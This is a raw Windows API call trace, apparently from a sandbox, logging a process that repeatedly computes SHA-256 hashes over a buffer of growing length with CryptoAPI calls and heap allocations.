	[0250.442] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.442] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.442] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.443] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.443] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0250.443] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3438
	[0250.443] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3438, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3438, pdwDataLen=0x128c3c) returned 1
	[0250.443] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.443] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.443] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.443] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.443] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0250.443] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3460
	[0250.443] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3460, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3460, pdwDataLen=0x128c3c) returned 1
	[0250.443] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.443] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.443] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.444] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.444] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0250.444] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3488
	[0250.444] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3488, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3488, pdwDataLen=0x128c3c) returned 1
	[0250.444] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.444] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.444] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.444] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.444] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0250.444] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c34b0
	[0250.444] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c34b0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c34b0, pdwDataLen=0x128c3c) returned 1
	[0250.444] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.444] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.444] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.445] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.445] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0250.445] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c34d8
	[0250.445] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c34d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c34d8, pdwDataLen=0x128c3c) returned 1
	[0250.445] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.445] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.445] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.445] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.445] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0250.445] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3500
	[0250.445] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3500, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3500, pdwDataLen=0x128c3c) returned 1
	[0250.445] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.445] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.445] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.446] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.446] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0250.446] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3528
	[0250.446] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3528, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3528, pdwDataLen=0x128c3c) returned 1
	[0250.446] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.446] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.446] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.446] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.446] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0250.446] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3550
	[0250.446] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3550, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3550, pdwDataLen=0x128c3c) returned 1
	[0250.446] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.446] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.446] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.447] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.447] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0250.447] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3578
	[0250.447] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3578, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3578, pdwDataLen=0x128c3c) returned 1
	[0250.447] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.447] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.447] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.447] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.447] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0250.447] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c35a0
	[0250.447] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c35a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c35a0, pdwDataLen=0x128c3c) returned 1
	[0250.447] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.447] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.447] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.448] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.448] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0250.448] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c35c8
	[0250.448] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c35c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c35c8, pdwDataLen=0x128c3c) returned 1
	[0250.448] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.448] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.448] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.448] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.448] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0250.448] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c35f0
	[0250.448] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c35f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c35f0, pdwDataLen=0x128c3c) returned 1
	[0250.448] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.448] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.448] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.449] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.449] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0250.449] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3618
	[0250.449] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3618, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3618, pdwDataLen=0x128c3c) returned 1
	[0250.449] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.449] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.449] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.449] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.449] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0250.449] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3640
	[0250.449] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3640, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3640, pdwDataLen=0x128c3c) returned 1
	[0250.449] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.449] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.449] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.450] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.450] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0250.450] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3668
	[0250.450] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3668, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3668, pdwDataLen=0x128c3c) returned 1
	[0250.450] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.450] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.450] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.450] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.450] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0250.450] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3690
	[0250.450] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3690, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3690, pdwDataLen=0x128c3c) returned 1
	[0250.450] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.450] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.450] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.451] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.451] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0250.451] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.451] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c36b8
	[0250.451] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c36b8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c36b8, pdwDataLen=0x128c3c) returned 1
	[0250.451] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.451] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.451] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.452] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.452] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0250.452] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c36e0
	[0250.452] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c36e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c36e0, pdwDataLen=0x128c3c) returned 1
	[0250.452] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.452] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.452] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.452] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.452] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0250.452] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3708
	[0250.452] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3708, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3708, pdwDataLen=0x128c3c) returned 1
	[0250.452] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.452] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.452] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.453] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.453] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0250.453] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3730
	[0250.453] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3730, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3730, pdwDataLen=0x128c3c) returned 1
	[0250.453] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.453] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.453] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.453] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.453] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0250.453] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3758
	[0250.453] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3758, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3758, pdwDataLen=0x128c3c) returned 1
	[0250.453] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.453] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.453] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.454] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.454] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0250.454] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3780
	[0250.454] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3780, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3780, pdwDataLen=0x128c3c) returned 1
	[0250.454] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.454] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.454] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.454] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.454] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0250.454] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c37a8
	[0250.454] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c37a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c37a8, pdwDataLen=0x128c3c) returned 1
	[0250.454] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.454] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.454] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.455] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.455] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0250.455] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c37d0
	[0250.455] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c37d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c37d0, pdwDataLen=0x128c3c) returned 1
	[0250.455] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.455] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.455] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.455] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.455] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0250.455] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c37f8
	[0250.455] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c37f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c37f8, pdwDataLen=0x128c3c) returned 1
	[0250.455] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.455] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
